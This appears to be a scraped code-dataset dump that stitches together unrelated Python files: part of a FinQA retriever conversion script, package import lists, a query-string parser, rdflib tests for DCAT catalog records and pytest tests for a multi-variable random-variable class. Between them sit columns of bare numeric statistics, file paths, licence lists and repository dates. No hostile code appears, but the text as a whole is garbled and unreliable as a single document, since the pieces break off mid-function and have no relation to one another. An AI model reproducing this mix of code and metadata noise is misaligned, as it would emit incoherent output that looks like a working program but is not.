all_text = pre_text + post_text
table = each_data["table"]
# all_retrieved = each_data["table_retrieved"] + each_data["text_retrieved"]
# sorted_dict = sorted(all_retrieved, key=lambda kv: kv["score"], reverse=True)
sorted_dict_text = sorted(
text_retrieved, key=lambda kv: kv["score"], reverse=True)
sorted_dict_table = sorted(
table_retrieved, key=lambda kv: kv["score"], reverse=True)
# print(sorted_dict_table)
acc_len = 0
all_text_in = {}
all_table_in = {}
# if mode == "table":
for tmp in sorted_dict_table[:topn]:
this_sent_ind = int(tmp["ind"].split("_")[1])
this_sent = table_row_to_text(table[0], table[this_sent_ind])
all_table_in[tmp["ind"]] = this_sent
for tmp in sorted_dict_text[:topn]:
this_sent_ind = int(tmp["ind"].split("_")[1])
all_text_in[tmp["ind"]] = all_text[this_sent_ind]
this_model_input = []
# sorted_dict = sorted(all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# this_model_input.extend(sorted_dict)
# sorted_dict = sorted(all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# this_model_input.extend(sorted_dict)
# original_order
sorted_dict_table = sorted(
all_table_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
sorted_dict_text = sorted(
all_text_in.items(), key=lambda kv: int(kv[0].split("_")[1]))
# for tmp in sorted_dict_text:
# if int(tmp[0].split("_")[1]) < len(pre_text):
# this_model_input.append(tmp)
# for tmp in sorted_dict_table:
# this_model_input.append(tmp)
# for tmp in sorted_dict_text:
# if int(tmp[0].split("_")[1]) >= len(pre_text):
# this_model_input.append(tmp)
if mode == "table":
for tmp in sorted_dict_table:
this_model_input.append(tmp)
else:
for tmp in sorted_dict_text:
this_model_input.append(tmp)
each_data["qa"]["model_input"] = this_model_input
with open(json_out, "w") as f:
json.dump(data, f, indent=4)
print(len(data))
if __name__ == '__main__':
root = "/home/leo_lin_colab/FinQA-main/"
### convert the results from the retriever.
### json_in is the inference result file generated from the retriever. Edit the paths here.
json_in = root + "code/retriever/path_to_store_outputs/inference_only_20211205213023_retriever-bert-base-train_toy/results/test/predictions.json"
json_out = root + "dataset/train_toy_retrieve.json"
convert_train(json_in, json_out, topn=3, max_len=290)
json_in = root + "code/retriever/path_to_store_outputs/inference_only_20211205212940_retriever-bert-base-dev_toy/results/test/predictions.json"
json_out = root + "dataset/dev_toy_retrieve.json"
convert_train(json_in, json_out, topn=3, max_len=290)
json_in = root + "code/retriever/path_to_store_outputs/inference_only_20211205212832_retriever-bert-base-test_toy/results/test/predictions.json"
json_out = root + "dataset/test_toy_retrieve.json"
convert_test(json_in, json_out, topn=3, max_len=290)
# json_in = root + "outputs/inference_only_20210505220955_retriever-bert-base-7k-test-new/results/test/predictions.json"
# json_out = root + "FinQA/dataset/test_retrieve_7k_text_only.json"
# convert_test_infer(json_in, json_out, topn=3, mode="text")
| 31.64557
| 149
| 0.5919
| 1,370
| 10,000
| 3.99562
| 0.092701
| 0.071246
| 0.058824
| 0.038363
| 0.814943
| 0.796675
| 0.782974
| 0.770004
| 0.74662
| 0.696931
| 0
| 0.017407
| 0.2819
| 10,000
| 315
| 150
| 31.746032
| 0.744882
| 0.1704
| 0
| 0.710383
| 0
| 0.016393
| 0.110908
| 0.060584
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027322
| false
| 0
| 0.032787
| 0
| 0.071038
| 0.010929
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2e9d2dcb3a0622d6b62b0ea852e72d24d8f5d2a
| 108
|
py
|
Python
|
source/utils/__init__.py
|
EmilePapillon/Udacity-MLND-Capstone
|
e5b5112c0a8c24fca32dc60953b93c5e4772b5cb
|
[
"MIT"
] | 19
|
2022-01-19T08:26:26.000Z
|
2022-03-25T18:17:57.000Z
|
source/utils/__init__.py
|
EmilePapillon/Udacity-MLND-Capstone
|
e5b5112c0a8c24fca32dc60953b93c5e4772b5cb
|
[
"MIT"
] | null | null | null |
source/utils/__init__.py
|
EmilePapillon/Udacity-MLND-Capstone
|
e5b5112c0a8c24fca32dc60953b93c5e4772b5cb
|
[
"MIT"
] | 5
|
2022-01-20T07:03:06.000Z
|
2022-03-06T01:48:14.000Z
|
from .dir_utils import *
from .image_utils import *
from .model_utils import *
from .dataset_utils import *
| 21.6
| 28
| 0.777778
| 16
| 108
| 5
| 0.4375
| 0.55
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 108
| 4
| 29
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b2eec956624d63cc34822c5d8782052aa71d91ae
| 2,947
|
py
|
Python
|
venv/Lib/site-packages/qcs_api_client/operations/sync_from_dict/__init__.py
|
Holly-Jiang/QCTSA
|
b90136b9df18fc21ae53b431f1e5e0c6ef786fae
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/qcs_api_client/operations/sync_from_dict/__init__.py
|
Holly-Jiang/QCTSA
|
b90136b9df18fc21ae53b431f1e5e0c6ef786fae
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/qcs_api_client/operations/sync_from_dict/__init__.py
|
Holly-Jiang/QCTSA
|
b90136b9df18fc21ae53b431f1e5e0c6ef786fae
|
[
"MIT"
] | null | null | null |
from qcs_api_client.api.account.add_group_user import sync_from_dict as add_group_user
from qcs_api_client.api.account.list_group_users import sync_from_dict as list_group_users
from qcs_api_client.api.account.list_user_groups import sync_from_dict as list_user_groups
from qcs_api_client.api.account.remove_group_user import sync_from_dict as remove_group_user
from qcs_api_client.api.authentication.auth_email_password_reset_token import (
sync_from_dict as auth_email_password_reset_token,
)
from qcs_api_client.api.authentication.auth_get_user import sync_from_dict as auth_get_user
from qcs_api_client.api.authentication.auth_reset_password import sync_from_dict as auth_reset_password
from qcs_api_client.api.authentication.auth_reset_password_with_token import (
sync_from_dict as auth_reset_password_with_token,
)
from qcs_api_client.api.client_applications.check_client_application import sync_from_dict as check_client_application
from qcs_api_client.api.client_applications.get_client_application import sync_from_dict as get_client_application
from qcs_api_client.api.client_applications.list_client_applications import sync_from_dict as list_client_applications
from qcs_api_client.api.default.get_health import sync_from_dict as get_health
from qcs_api_client.api.default.health_check import sync_from_dict as health_check
from qcs_api_client.api.endpoints.create_endpoint import sync_from_dict as create_endpoint
from qcs_api_client.api.endpoints.delete_endpoint import sync_from_dict as delete_endpoint
from qcs_api_client.api.endpoints.get_default_endpoint import sync_from_dict as get_default_endpoint
from qcs_api_client.api.endpoints.get_endpoint import sync_from_dict as get_endpoint
from qcs_api_client.api.endpoints.list_endpoints import sync_from_dict as list_endpoints
from qcs_api_client.api.engagements.create_engagement import sync_from_dict as create_engagement
from qcs_api_client.api.quantum_processors.get_instruction_set_architecture import (
sync_from_dict as get_instruction_set_architecture,
)
from qcs_api_client.api.quantum_processors.get_quantum_processor import sync_from_dict as get_quantum_processor
from qcs_api_client.api.quantum_processors.list_quantum_processors import sync_from_dict as list_quantum_processors
from qcs_api_client.api.reservations.create_reservation import sync_from_dict as create_reservation
from qcs_api_client.api.reservations.delete_reservation import sync_from_dict as delete_reservation
from qcs_api_client.api.reservations.find_available_reservations import sync_from_dict as find_available_reservations
from qcs_api_client.api.reservations.list_reservations import sync_from_dict as list_reservations
from qcs_api_client.api.translation.get_quilt_calibrations import sync_from_dict as get_quilt_calibrations
from qcs_api_client.api.translation.translate_native_quil_to_encrypted_binary import (
sync_from_dict as translate_native_quil_to_encrypted_binary,
)
| 79.648649
| 118
| 0.902273
| 478
| 2,947
| 5.089958
| 0.112971
| 0.114673
| 0.115084
| 0.184135
| 0.819153
| 0.776819
| 0.431977
| 0.19852
| 0.085491
| 0
| 0
| 0
| 0.065151
| 2,947
| 36
| 119
| 81.861111
| 0.883122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.138889
| 0.777778
| 0
| 0.777778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
653ef93c96f60e11c71ef79510d65ba389a993a5
| 2,151
|
py
|
Python
|
__scraping__/sharesansar.com - requests, JSON/main-parse-url.py
|
furas/python-code
|
223d8245c6a2a058031f302feaffd9a4f900110e
|
[
"MIT"
] | 2
|
2015-12-12T20:14:12.000Z
|
2016-08-13T00:42:10.000Z
|
__scraping__/sharesansar.com - requests, JSON/main-parse-url.py
|
furas/python-code
|
223d8245c6a2a058031f302feaffd9a4f900110e
|
[
"MIT"
] | null | null | null |
__scraping__/sharesansar.com - requests, JSON/main-parse-url.py
|
furas/python-code
|
223d8245c6a2a058031f302feaffd9a4f900110e
|
[
"MIT"
] | null | null | null |
import urllib.parse
import pprint
query = 'draw=1&columns%5B0%5D%5Bdata%5D=DT_Row_Index&columns%5B0%5D%5Bname%5D=&columns%5B0%5D%5Bsearchable%5D=false&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B1%5D%5Bdata%5D=published_date&columns%5B1%5D%5Bname%5D=&columns%5B1%5D%5Bsearchable%5D=true&columns%5B1%5D%5Borderable%5D=false&columns%5B1%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B1%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B2%5D%5Bdata%5D=open&columns%5B2%5D%5Bname%5D=&columns%5B2%5D%5Bsearchable%5D=false&columns%5B2%5D%5Borderable%5D=false&columns%5B2%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B2%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B3%5D%5Bdata%5D=high&columns%5B3%5D%5Bname%5D=&columns%5B3%5D%5Bsearchable%5D=false&columns%5B3%5D%5Borderable%5D=false&columns%5B3%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B3%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B4%5D%5Bdata%5D=low&columns%5B4%5D%5Bname%5D=&columns%5B4%5D%5Bsearchable%5D=false&columns%5B4%5D%5Borderable%5D=false&columns%5B4%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B4%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B5%5D%5Bdata%5D=close&columns%5B5%5D%5Bname%5D=&columns%5B5%5D%5Bsearchable%5D=false&columns%5B5%5D%5Borderable%5D=false&columns%5B5%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B5%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B6%5D%5Bdata%5D=per_change&columns%5B6%5D%5Bname%5D=&columns%5B6%5D%5Bsearchable%5D=false&columns%5B6%5D%5Borderable%5D=false&columns%5B6%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B6%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B7%5D%5Bdata%5D=traded_quantity&columns%5B7%5D%5Bname%5D=&columns%5B7%5D%5Bsearchable%5D=false&columns%5B7%5D%5Borderable%5D=false&columns%5B7%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B7%5D%5Bsearch%5D%5Bregex%5D=false&columns%5B8%5D%5Bdata%5D=traded_amount&columns%5B8%5D%5Bname%5D=&columns%5B8%5D%5Bsearchable%5D=false&columns%5B8%5D%5Borderable%5D=false&columns%5B8%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B8%5D%5Bsearch%5D%5Bregex%5D=false&start=0&length=20&search%5Bvalue%5D=&search%5Bregex%5D=false&company=95&_=1639245456705'
items = urllib.parse.parse_qs(query)
pprint.pprint(items)
| 239
| 2,055
| 0.812645
| 379
| 2,151
| 4.591029
| 0.134565
| 0.108621
| 0.201149
| 0.087931
| 0.647701
| 0.311494
| 0.151724
| 0
| 0
| 0
| 0
| 0.153954
| 0.006509
| 2,151
| 8
| 2,056
| 268.875
| 0.660271
| 0
| 0
| 0
| 0
| 0.2
| 0.951163
| 0.951163
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.4
| 0
| 0.4
| 0.4
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e8ff1e08ecbbffb3168d7c779989697ef937dce2
| 10,251
|
py
|
Python
|
tests/test_catalogrecord.py
|
Informasjonsforvaltning/datacatalogtordf
|
7e21186e9bd03e434a0319b2f36aecf78d7c16ee
|
[
"Apache-2.0"
] | 2
|
2020-05-18T06:57:12.000Z
|
2020-06-25T12:46:42.000Z
|
tests/test_catalogrecord.py
|
Informasjonsforvaltning/datacatalogtordf
|
7e21186e9bd03e434a0319b2f36aecf78d7c16ee
|
[
"Apache-2.0"
] | 42
|
2020-03-17T16:09:56.000Z
|
2022-03-28T06:12:01.000Z
|
tests/test_catalogrecord.py
|
Informasjonsforvaltning/datacatalogtordf
|
7e21186e9bd03e434a0319b2f36aecf78d7c16ee
|
[
"Apache-2.0"
] | null | null | null |
"""Test cases for the dataset module."""
from pytest_mock import MockFixture
from rdflib import Graph
from rdflib.compare import graph_diff, isomorphic
from skolemizer.testutils import skolemization
from datacatalogtordf import CatalogRecord
from datacatalogtordf import Dataset
from tests.testutils import assert_isomorphic
def test_to_graph_should_return_identifier_set_at_constructor() -> None:
"""It returns an identifier graph isomorphic to spec."""
catalogrecord = CatalogRecord("http://example.com/datasets/1")
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
<http://example.com/datasets/1> a dcat:CatalogRecord .
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_identifier() -> None:
"""It returns an identifier graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/datasets/1"
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
<http://example.com/datasets/1> a dcat:CatalogRecord .
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_skolemization(mocker: MockFixture) -> None:
"""It returns a skolemized identifier graph isomorphic to spec."""
catalogrecord = CatalogRecord()
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
<http://wwww.digdir.no/.well-known/skolem/284db4d2-80c2-11eb-82c3-83e80baa2f94>
a dcat:CatalogRecord .
"""
mocker.patch(
"skolemizer.Skolemizer.add_skolemization",
return_value=skolemization,
)
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
assert_isomorphic(g1, g2)
def test_to_graph_should_return_title() -> None:
"""It returns a title graph isomorphic to spec."""
"""It returns an identifier graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
catalogrecord.title = {"nb": "Tittel 1", "en": "Title 1"}
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
dct:title "Title 1"@en, "Tittel 1"@nb ;
.
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_description() -> None:
"""It returns a description graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
catalogrecord.description = {"nb": "Beskrivelse", "en": "Description"}
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
dct:description "Description"@en, "Beskrivelse"@nb ;
.
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_listing_date() -> None:
"""It returns a listing_date graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
catalogrecord.listing_date = "2019-12-31"
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
dct:issued "2019-12-31"^^xsd:date ;
.
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_modification_date() -> None:
"""It returns a modification_date graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
catalogrecord.modification_date = "2019-12-31"
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
dct:modified "2019-12-31"^^xsd:date ;
.
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_primary_topic() -> None:
"""It returns a primary_topic graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
dataset = Dataset()
dataset.identifier = "http://example.com/datasets/1"
catalogrecord.primary_topic = dataset
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
foaf:primaryTopic <http://example.com/datasets/1>;
.
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_primary_topic_skolemization(
mocker: MockFixture,
) -> None:
"""It returns a primary_topic graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
dataset = Dataset()
catalogrecord.primary_topic = dataset
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
foaf:primaryTopic
<http://wwww.digdir.no/.well-known/skolem/284db4d2-80c2-11eb-82c3-83e80baa2f94>
.
"""
mocker.patch(
"skolemizer.Skolemizer.add_skolemization",
return_value=skolemization,
)
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
def test_to_graph_should_return_conforms_to() -> None:
"""It returns a conforms_to graph isomorphic to spec."""
catalogrecord = CatalogRecord()
catalogrecord.identifier = "http://example.com/catalogrecords/1"
catalogrecord.conforms_to.append("http://example.com/standards/1")
catalogrecord.conforms_to.append("http://example.com/standards/2")
src = """
@prefix dct: <http://purl.org/dc/terms/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix dcat: <http://www.w3.org/ns/dcat#> .
<http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
dct:conformsTo <http://example.com/standards/1> ,
<http://example.com/standards/2> ;
.
"""
g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
g2 = Graph().parse(data=src, format="turtle")
_isomorphic = isomorphic(g1, g2)
if not _isomorphic:
_dump_diff(g1, g2)
pass
assert _isomorphic
# ---------------------------------------------------------------------- #
# Utils for displaying debug information
def _dump_diff(g1: Graph, g2: Graph) -> None:
in_both, in_first, in_second = graph_diff(g1, g2)
print("\nin both:")
_dump_turtle(in_both)
print("\nin first:")
_dump_turtle(in_first)
print("\nin second:")
_dump_turtle(in_second)
def _dump_turtle(g: Graph) -> None:
for _l in g.serialize(format="turtle").splitlines():
if _l:
print(_l)
| 33.5
| 87
| 0.641303
| 1,310
| 10,251
| 4.901527
| 0.1
| 0.034886
| 0.044853
| 0.059804
| 0.860302
| 0.844105
| 0.834917
| 0.814515
| 0.814515
| 0.790531
| 0
| 0.041948
| 0.190713
| 10,251
| 305
| 88
| 33.609836
| 0.73204
| 0.065457
| 0
| 0.738938
| 0
| 0.097345
| 0.477287
| 0.012888
| 0
| 0
| 0
| 0
| 0.048673
| 1
| 0.053097
| false
| 0.039823
| 0.030973
| 0
| 0.084071
| 0.017699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
330204a7f13757ec3958a3ca43b17ab6a3417823
| 16,551
|
py
|
Python
|
tests/probability2/multi_discrete_rv_test.py
|
rpazuki/algos
|
bca46326f58eb983db6efe55320bf95fcf2b895f
|
[
"MIT"
] | null | null | null |
tests/probability2/multi_discrete_rv_test.py
|
rpazuki/algos
|
bca46326f58eb983db6efe55320bf95fcf2b895f
|
[
"MIT"
] | 1
|
2020-08-12T06:56:59.000Z
|
2020-08-12T08:57:30.000Z
|
tests/probability2/multi_discrete_rv_test.py
|
chasing-entropy/algos
|
bca46326f58eb983db6efe55320bf95fcf2b895f
|
[
"MIT"
] | null | null | null |
import pytest
from probability2 import MultiDiscreteRV
def test_len_multidiscreterv():
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
assert len(random_v) == 2
assert random_v.size == 2
random_v = MultiDiscreteRV((1, "aaa", "w1"))
assert len(random_v) == 3
assert random_v.size == 3
random_v = MultiDiscreteRV((1, 2, 4, 2), ["X1", "X2", "X3", "X4"])
assert len(random_v) == 4
assert random_v.size == 4
random_v = MultiDiscreteRV([1, 2, 3, 4], ["X1", "X2", "X3", "X4"])
assert len(random_v) == 4
assert random_v.size == 4
def test_index_of_multidiscreterv():
random_v = MultiDiscreteRV(1, ["X1"])
assert random_v.index_of("X1") == 0
assert random_v.index_of("Y1") == -1
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
assert random_v.index_of("X1") == 0
assert random_v.index_of("X2") == 1
assert random_v.index_of("Y1") == -1
random_v = MultiDiscreteRV((1, "aaa", "w1"), ["X1", "X2", "X3"])
assert random_v.index_of("X1") == 0
assert random_v.index_of("X2") == 1
assert random_v.index_of("X3") == 2
assert random_v.index_of("Y1") == -1
random_v = MultiDiscreteRV(
(1, 2, 4, 2),
["X1", "X2", "X3", "X4"],
)
assert random_v.index_of("X1") == 0
assert random_v.index_of("X2") == 1
assert random_v.index_of("X3") == 2
assert random_v.index_of("X4") == 3
assert random_v.index_of("Y1") == -1
def test_indexer_multidiscreterv():
random_v = MultiDiscreteRV(1, ["X1"])
assert random_v[0].name == "X1"
assert random_v["X1"].name == "X1"
with pytest.raises(ValueError):
assert random_v[(1,)] == "X1"
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
assert random_v[0].name == "X1"
assert random_v["X1"].name == "X1"
assert random_v[1].name == "X2"
assert random_v["X2"].name == "X2"
random_v = MultiDiscreteRV(
(1, "aaa", "w1"),
["X1", "X2", "X3"],
)
assert random_v[0].name == "X1"
assert random_v["X1"].name == "X1"
assert random_v[1].name == "X2"
assert random_v["X2"].name == "X2"
assert random_v[2].name == "X3"
assert random_v["X3"].name == "X3"
random_v = MultiDiscreteRV(
(1, 2, 4, 2),
["X1", "X2", "X3", "X4"],
)
assert random_v[0].name == "X1"
assert random_v["X1"].name == "X1"
assert random_v[1].name == "X2"
assert random_v["X2"].name == "X2"
assert random_v[2].name == "X3"
assert random_v["X3"].name == "X3"
assert random_v[3].name == "X4"
assert random_v["X4"].name == "X4"
def test_contains_multidiscreterv():
random_v = MultiDiscreteRV(1)
assert "X1" in random_v
assert "Y1" not in random_v
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
assert "X1" in random_v
assert "X2" in random_v
assert "Y1" not in random_v
random_v = MultiDiscreteRV(
(1, "aaa", "w1"),
["X1", "X2", "X3"],
)
assert "X1" in random_v
assert "X2" in random_v
assert "X3" in random_v
assert "Y1" not in random_v
random_v = MultiDiscreteRV(
(1, 2, 4, 2),
["X1", "X2", "X3", "X4"],
)
assert "X1" in random_v
assert "X2" in random_v
assert "X3" in random_v
assert "X4" in random_v
assert "Y1" not in random_v
def test_to_key_exceptions_multidiscreterv():
# wrong name
random_v = MultiDiscreteRV(1, ["X1"])
with pytest.raises(ValueError):
random_v.to_key(x2=2)
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
with pytest.raises(ValueError):
random_v.to_key(x1=1, x3=2)
with pytest.raises(ValueError):
random_v.to_key(x3=1, x1=2)
random_v = MultiDiscreteRV(
("a", 1, "w1"),
["X1", "X2", "X3"],
)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=3, x4=2)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x4=2, x2=3)
with pytest.raises(ValueError):
random_v.to_key(x4=2, x1=1, x2=3)
random_v = MultiDiscreteRV(
(1, 2, 4, 2),
["X1", "X2", "X3", "X4"],
)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=3, x3=2, x5=1)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=2, x5=1, x3=3)
with pytest.raises(ValueError):
random_v.to_key(x1=2, x5=1, x2=1, x3=3)
with pytest.raises(ValueError):
random_v.to_key(x5=1, x1=2, x2=1, x3=3)
# wrong length
random_v = MultiDiscreteRV(1, ["X1"])
with pytest.raises(ValueError):
random_v.to_key()
with pytest.raises(ValueError):
random_v.to_key(1, 2)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1)
with pytest.raises(ValueError):
random_v.to_key(x1=1, x2=1)
random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
with pytest.raises(ValueError):
random_v.to_key()
with pytest.raises(ValueError):
random_v.to_key(1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, 4)
with pytest.raises(ValueError):
random_v.to_key(x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, 3, x1=1)
with pytest.raises(ValueError):
random_v.to_key(1, x1=1, x2=1)
with pytest.raises(ValueError):
random_v.to_key(1, 2, x1=1, x2=1)
